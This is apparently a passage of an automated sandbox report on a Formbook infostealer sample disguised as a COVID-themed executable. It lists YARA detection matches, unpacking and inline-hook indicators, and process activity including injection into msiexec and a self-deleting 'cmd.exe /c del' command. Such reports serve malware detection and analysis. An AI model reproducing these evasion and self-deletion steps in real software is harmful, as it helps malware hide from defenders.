          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_04BB058F0_2_04BB058F
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_04BB06B00_2_04BB06B0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_0974F5380_2_0974F538
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_004010263_2_00401026
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D1833_2_0041D183
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D1863_2_0041D186
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041EB423_2_0041EB42
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041EC053_2_0041EC05
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041E4CE3_2_0041E4CE
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00402D873_2_00402D87
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00409E403_2_00409E40
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151F9003_2_0151F900
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015341203_2_01534120
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D10023_2_015D1002
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015EE8243_2_015EE824
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E28EC3_2_015E28EC
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152B0903_2_0152B090
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015420A03_2_015420A0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E20A83_2_015E20A8
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E2B283_2_015E2B28
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D03DA3_2_015D03DA
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DDBD23_2_015DDBD2
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154EBB03_2_0154EBB0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E22AE3_2_015E22AE
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E1D553_2_015E1D55
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E2D073_2_015E2D07
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01510D203_2_01510D20
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E25DD3_2_015E25DD
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152D5E03_2_0152D5E0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015425813_2_01542581
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DD4663_2_015DD466
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152841F3_2_0152841F
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015EDFCE3_2_015EDFCE
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E1FF13_2_015E1FF1
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DD6163_2_015DD616
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01536E303_2_01536E30
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E2EF73_2_015E2EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0464D46614_2_0464D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0459841F14_2_0459841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04651D5514_2_04651D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04652D0714_2_04652D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04580D2014_2_04580D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046525DD14_2_046525DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0459D5E014_2_0459D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045B258114_2_045B2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045A6E3014_2_045A6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0464D61614_2_0464D616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04652EF714_2_04652EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04651FF114_2_04651FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0464100214_2_04641002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046528EC14_2_046528EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0459B09014_2_0459B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046520A814_2_046520A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045B20A014_2_045B20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0458F90014_2_0458F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045A412014_2_045A4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046522AE14_2_046522AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04652B2814_2_04652B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0464DBD214_2_0464DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045BEBB014_2_045BEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D18314_2_0069D183
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D18614_2_0069D186
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069E4CE14_2_0069E4CE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00682D8714_2_00682D87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00682D9014_2_00682D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00689E4014_2_00689E40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00682FB014_2_00682FB0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: String function: 0151B150 appears 45 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0458B150 appears 35 times
          Source: Po-covid19 2372#w2..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Po-covid19 2372#w2..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Po-covid19 2372#w2..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Po-covid19 2372#w2..exeBinary or memory string: OriginalFilename vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.250216585.0000000000B10000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.248339854.000000000017A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.263476801.0000000009000000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000002.00000000.244485591.000000000023A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000003.00000000.246312953.0000000000ABA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000003.00000002.299564260.000000000179F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000003.00000002.298645878.000000000141F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exeBinary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: Po-covid19 2372#w2..exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Po-covid19 2372#w2..exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@6/4
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Po-covid19 2372#w2..exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
          Source: Po-covid19 2372#w2..exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Po-covid19 2372#w2..exeReversingLabs: Detection: 27%
          Source: unknownProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: unknownProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Po-covid19 2372#w2..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Po-covid19 2372#w2..exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Po-covid19 2372#w2..exeStatic file information: File size 1304576 > 1048576
          Source: Po-covid19 2372#w2..exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x106200
          Source: Po-covid19 2372#w2..exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msiexec.pdb source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Po-covid19 2372#w2..exe, 00000003.00000002.299260110.000000000160F000.00000040.00000001.sdmp, msiexec.exe, 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Po-covid19 2372#w2..exe, msiexec.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeUnpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeUnpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00076008 push ss; iretd 0_2_0007600A
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_000723E2 push eax; ret 0_2_000723E3
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC2488 push ss; iretd 0_2_00BC249B
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_09743122 pushad ; iretd 0_2_09743123
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 2_2_00136008 push ss; iretd 2_2_0013600A
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 2_2_001323E2 push eax; ret 2_2_001323E3
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D0E2 push eax; ret 3_2_0041D0E8
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D0EB push eax; ret 3_2_0041D152
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D095 push eax; ret 3_2_0041D0E8
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D14C push eax; ret 3_2_0041D152
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D95B push ebp; iretd 3_2_0041D95F
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_004163D5 push ebx; ret 3_2_004163D6
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_009B6008 push ss; iretd 3_2_009B600A
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_009B23E2 push eax; ret 3_2_009B23E3
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0156D0D1 push ecx; ret 3_2_0156D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045DD0D1 push ecx; ret 14_2_045DD0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D0EB push eax; ret 14_2_0069D152
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D0E2 push eax; ret 14_2_0069D0E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D095 push eax; ret 14_2_0069D0E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D14C push eax; ret 14_2_0069D152
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069D95B push ebp; iretd 14_2_0069D95F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_006963D5 push ebx; ret 14_2_006963D6
          Source: initial sampleStatic PE information: section name: .text entropy: 7.44459929766

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEA
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          bar